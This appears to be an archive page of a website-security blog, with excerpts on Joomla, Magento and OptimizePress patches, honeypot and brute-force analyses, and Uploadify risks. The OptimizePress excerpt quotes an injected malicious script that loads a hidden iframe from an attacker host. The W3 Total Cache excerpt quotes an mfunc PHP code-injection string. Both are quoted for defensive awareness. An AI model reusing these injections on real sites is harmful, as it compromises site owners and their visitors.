Joomla Security Updates – Version 2.5.19 and 3.2.3 Released

The Joomla team just released 2 security updates and pushed out the stable versions for Joomla 2.5.19 and 3.2.3. If you run your site on Joomla, you need to update and apply these patches ASAP to ensure that your site continues to run securely.

If you are behind our CloudProxy Firewall, we will virtually patch these for you so you’re protected even if you do not upgrade. The Joomla website has more details on the security updates.

Issues fixed

On Joomla 2.5.19, these two issues were listed fixed:

Medium Priority – Core XSS Vulnerability More information
Medium Priority – Core XSS Vulnerability More information

But on Joomla 3.2.3, the following issues were fixed:

High Priority – Core SQL Injection More information
Medium Priority – Core XSS Vulnerability More information
Medium Priority – Core XSS Vulnerability More information
Medium Priority – Core Unauthorised Logins More information

As you can see, there are some high priority SQL injection vulnerabilities along with some unauthorized login vulnerabilities in their Gmail login module (disabled by default).

The SQL injection seems to be related to an exploit released almost a month ago on the weblinks-categories id that was not escaped properly, and seems very easy to exploit.

Our team is still investigating the impact of this one and other vulnerabilities, and we will post more details as we identify them.

Recent OptimizePress Vulnerability Being Mass Infected

A few weeks ago we wrote about a file upload vulnerability in the OptmizePress theme. We were seeing a few sites being compromised by it, but nothing major.

That all changed yesterday when we detected roughly 2,000 websites compromised with iFrames that seemed to be caused by this same vulnerability. All of the contaminated websites that we have reviewed and cleared were using OptmizePress, and they all had the same iFrame injected in them:

<script> if(document.all ){ document.write ("<iframe 
 src=" httx:// gezidotojyk.org/ ohui.cgi?19" width="1" 
height="1"></iframe>"


Read More

Case Study: Analyzing a WordPress Attack – Dissecting the webr00t cgi shell – Part I

November 1st started like any other day on the web. Billions of requests were being shot virtually between servers in safe and not so safe attempts to access information. After months of waiting, finally one of those not so safe request hit one of our honeypots.

We won’t get into the location of the site because it really doesn’t matter, a fact that most critics don’t realize. As is often the case, the honeypot site was quiet without much traffic and the weakness was access control.

We intentionally left the password to the site to one of the top 10 passwords, with continuous attempts it took about 3 months before it was accessed.

This time though we were ready and this is how it went..

Read More

Joomla Media Manager Attacks in the Wild

If you are using Joomla and didn’t update your site recently, you better stop doing whatever you are doing, and update it now. There is a very serious vulnerability in Joomla’s Media Manager component (included by default), that can allow malicious files to be uploaded to your site.

The only two safe versions of Joomla are 3.1.5 and 2.5.14. If you are not using either of them, you are at risk.


Read More

W3 Total Cache and WP Super Cache Vulnerability Being Targeted in the Wild

As if on queue, almost 7 days since we released the post about the latest W3TC and WP Super Cache remote command execution vulnerability, we have started to see attacks spring up across our network.

In our post you might remember this:

<!–mfunc echo PHP_VERSION; –><!–/mfunc–>

In this example we explained how it was a very simple approach to displaying the version of PHP on your server. There were a lot of questions following that saying, well what’s so harmful in that. Etc… With little help from us the attackers go on to show us what they can do.

Taking a Look at the Attacks

In this section I’ll show you three of the various attacks we’re seeing. In each you can see how they abuse the mfunc vulnerability, one in a more traditional approach of injecting a backdoor and other in a more creative way that allows them to abuse HTTP headers. In either case they all seem to be getting passed via comments, and we give an example of that below. This is obviously for educational purposes only.

Read More

Mass WordPress Brute Force Attacks? – Myth or Reality

We are seeing in the media some noise about a large distributed brute force attacks against all hosts targeting WordPress sites. According to reports, they are seeing a large botnet with more than 90,000 servers attempting to log in by cycling different usernames and passwords against the WordPress access points: /wp-login.php and /wp-admin.

This got us thinking, well we block a lot of attacks why not look at the logs to see what they tell us. So we did.

The Data

Looking back, we can see in our historical database the following:

2012/Dec: 678,519 login attempts blocked

2013/Jan: 1,252,308 login attempts blocked (40k per day)

2013/Feb: 1,034,323 login attempts blocked (36k per day)

2013/Mar: 950,389 login attempts blocked (31k per day)

2013/Apr: 774,104 for the first 10 days – 77,410 per day


Read More

Joomla 2.5.8 and 3.0.2 Released (Security Updates)

Joomla 2.5.8 and 3.0.2 were just released today fixing a medium severity security bug related to a clickjacking/XSS vulnerability. You can find more details on their release notes:

If you are not familiar with ClickJacking, Wikipedia explains it well:

Clickjacking is a malicious technique of tricking a Web user into clicking on something different to what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages. It is a browser security issue that is a vulnerability across a variety of browsers and platforms. A clickjack takes the form of embedded code or a script that can execute without the user’s knowledge, such as clicking on a button that appears to perform another function.

And remember, the leading cause for website compromises is outdated software! So as a website owner, you have to do your part to minimize risk and keep your site (and your users) safe. Update now!

Sucuri SiteCheck was also updated to alert users not running version 2.5.8/3.0.2 on their Joomla sites.

Joomla 2.5.7 Released (Security Update)

Joomla 2.5.7 was just released today fixing 2 low severity security bugs and added a few other improvements. As always, we recommend all our Joomla users to update to 2.5.7 as soon as they can.

From their announcement page, here are the security bugs fixed:

  • Low Priority – Core – XSS Vulnerability: Inadequate escaping of output leads to XSS vulnerability in language switcher module.
  • Low Priority – Core – XSS Vulnerability: Inadequate escaping of output leads to XSS vulnerability.

Remember, the leading cause for website compromises is outdated software! So as a website owner, you have to do your part to minimize risk and keep your site (and your users) safe. Update now!

Sucuri SiteCheck was also updated to alert users not running version 2.5.7 on their Joomla sites.

Magento Security Update (1.7.0.2) – Zend_XmlRpc Vulnerability

A few days ago, Magento 1.7.0.2 was released to fix a very serious security vulnerability that allows attackers to read any file on the web server where the Zend XMLRPC functionality is enabled. This might include password files, configuration files, and possibly even databases if they are stored on the same machine as the Magento web server.

The Magento team provides the following info in their post:

Read More

Uploadify, Uploadify and Uploadify – The New TimThumb?

We are seeing a lot of noise again regarding the Uploadify script vulnerabilities affecting some WordPress themes/plugins. If you are not familiar, Uploadify allows anyone to upload anything they want to your site without any authentication.

Very very useful, no? Maybe, but at what cost? If a bad guy/gal knows that you have the Uploadify script, they can upload anything they want too (backdoors) and hack your site.

First, Uploadify is nothing new. When we were reporting on the TimThumb vulnerabilities, we were also notifying everyone about the issues with uploadify.

Been Around

  1. In October of 2011 we warned everyone to remove and check for Uploadify: Remove Unused/Testing/Debug Software From Your Site
  2. We put out a post in August of 2011 listing themes affected by TimThumb, we also listed the ones Using uploadify as unsafe: Timthumb Security Vulnerability – List of Themes
  3. An oldie but goodie, TimThumb (Tip of the Iceberg), Uploadify was also included

  4. Read More